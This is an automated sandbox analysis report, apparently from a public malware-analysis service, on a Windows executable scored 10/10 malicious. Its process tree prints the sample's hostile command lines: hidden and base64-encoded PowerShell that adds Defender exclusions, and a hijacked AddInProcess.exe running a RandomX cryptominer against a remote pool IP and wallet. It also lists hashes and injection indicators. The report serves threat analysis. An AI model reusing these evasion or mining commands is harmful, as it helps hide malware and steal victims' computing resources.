Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250313-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/04/2025, 23:26

General

  • Target

    quarantine/07jGt0K.exe

  • Size

    2.2MB

  • MD5

    a9187bdd14994263a71df6391de8f2ec

  • SHA1

    0dae6efc0a232f1eadbc9752f063ff2198658905

  • SHA256

    ae3c79e6c2bdf029bb05fdd16b5279b6e47c782beee25bf89657e1e1382a8226

  • SHA512

    1ba13176891feadf2fa5e0d60b9aa581270b56cafcfb2ad0d3a9d4a8ae27cb9d725ce3d0cf21d3a5bc69ca683d1c9577eb96ac454d41563a6fac49090bbfa8db

  • SSDEEP

    49152:VHHiXaFbnwwQkcU4KtU6hBKiJvGnoLJGps6KxLJFWDvR+ACha:5OaFbnwvFKa09J+EJGps6oLmkAp

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Executes dropped EXE 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3540
      • C:\Users\Admin\AppData\Local\Temp\quarantine\07jGt0K.exe
        "C:\Users\Admin\AppData\Local\Temp\quarantine\07jGt0K.exe"
        2⤵
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3128
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\Documents\App'"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3420
        • C:\Users\Admin\Documents\App\000001d30029.exe
          "C:\Users\Admin\Documents\App\000001d30029.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1996
          • C:\Users\Admin\Documents\App\000001d30029.exe
            "C:\Users\Admin\Documents\App\000001d30029.exe"
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4152
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\App\000001d30029.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:5400
        • C:\Users\Admin\Documents\App\000001d30029.exe
          C:\Users\Admin\Documents\App\000001d30029.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2072
          • C:\Users\Admin\Documents\App\000001d30029.exe
            "C:\Users\Admin\Documents\App\000001d30029.exe"
            4⤵
            • Executes dropped EXE
            PID:5896
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe --algo rx/0 -o 196.251.81.64:49301 -u 46hYgPSSLZTjmkoYx994198Gus57VJiWtBEiz4dk8qFwDtz4Hi1ZUg2RXomML4NY5PThMidbL5MnAecu8VAHuz51HvkMFWw.jogpreet -p x --cpu-max-threads-hint=50 -k
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:2580
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAEQALQBtAHAAcABSAEUAZgBFAFIARQBuAGMARQAgAC0ARQB4AGMAbAB1AFMAaQBvAG4AcAByAE8AYwBFAFMAUwAgAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUAIAAtAGYAbwByAGMARQA=
      1⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5364

    Network

    MITRE ATT&CK Enterprise v16

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      4c5fb491a4d95a628be4331e8650fedc

      SHA1

      f7007983f7a73af314c730323ede3c7dc43f9d21

      SHA256

      d79676422bd6f923dde282212f5ee993907c57b865a2dc574952fe494eb070cd

      SHA512

      4df1092cf4bc1539921ef35b803f45e888c5ae914bc8be4b2345916ba50903212ca4a0f452408cf9397fa4ba948582f095bb43d619f42a9fec35cb5718b89abf

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sooqskkl.zhr.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\Documents\App\000001d30029.exe

      Filesize

      1.7MB

      MD5

      cd2ebf2d63f95ca0fb60e7210bd0a29e

      SHA1

      7177910ebeb82395107dc48afe7d394eb8f42383

      SHA256

      099c5e5b9b443b77ba8dc6e467b97e86a36036c55264abb9405dafdc23ac25ac

      SHA512

      aee4d4a2cbe911c23d9ff906b05b1cd07ebc1677e07cee1cefa0a656597804ecf39496ac2f54ab3ae29442a7b7d1d0ec2b7f1fc5899d2a4385b4df6c86d15191

    • memory/1996-56-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-2697-0x000001BAFA220000-0x000001BAFA324000-memory.dmp

      Filesize

      1.0MB

    • memory/1996-21-0x000001BADE8A0000-0x000001BADEA50000-memory.dmp

      Filesize

      1.7MB

    • memory/1996-25-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-52-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-42-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-86-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-78-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-74-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-70-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-88-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-84-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-82-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-80-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-76-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-72-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-68-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-66-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-64-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-62-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-60-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-58-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-24-0x000001BAF8FC0000-0x000001BAF916A000-memory.dmp

      Filesize

      1.7MB

    • memory/1996-54-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-22-0x00007FFBDF4F3000-0x00007FFBDF4F5000-memory.dmp

      Filesize

      8KB

    • memory/1996-48-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-46-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-44-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-40-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-38-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-36-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-34-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-32-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-30-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-28-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-26-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-2698-0x000001BAFA320000-0x000001BAFA420000-memory.dmp

      Filesize

      1024KB

    • memory/1996-50-0x000001BAF8FC0000-0x000001BAF9165000-memory.dmp

      Filesize

      1.6MB

    • memory/1996-2699-0x000001BAFA420000-0x000001BAFA46C000-memory.dmp

      Filesize

      304KB

    • memory/1996-2701-0x000001BAF8F50000-0x000001BAF8FA4000-memory.dmp

      Filesize

      336KB

    • memory/3420-11-0x00007FFBE0BE0000-0x00007FFBE16A1000-memory.dmp

      Filesize

      10.8MB

    • memory/3420-12-0x00007FFBE0BE0000-0x00007FFBE16A1000-memory.dmp

      Filesize

      10.8MB

    • memory/3420-13-0x00007FFBE0BE0000-0x00007FFBE16A1000-memory.dmp

      Filesize

      10.8MB

    • memory/3420-16-0x00007FFBE0BE0000-0x00007FFBE16A1000-memory.dmp

      Filesize

      10.8MB

    • memory/3420-0-0x00007FFBE0BE3000-0x00007FFBE0BE5000-memory.dmp

      Filesize

      8KB

    • memory/3420-1-0x0000028A22B60000-0x0000028A22B82000-memory.dmp

      Filesize

      136KB

    • memory/4152-2704-0x0000000000400000-0x00000000004BA000-memory.dmp

      Filesize

      744KB

    • memory/4152-2705-0x0000026B25530000-0x0000026B2563C000-memory.dmp

      Filesize

      1.0MB

    • memory/4152-8275-0x0000026B25470000-0x0000026B254C6000-memory.dmp

      Filesize

      344KB

    • memory/4152-8274-0x0000026B0B3B0000-0x0000026B0B3B8000-memory.dmp

      Filesize

      32KB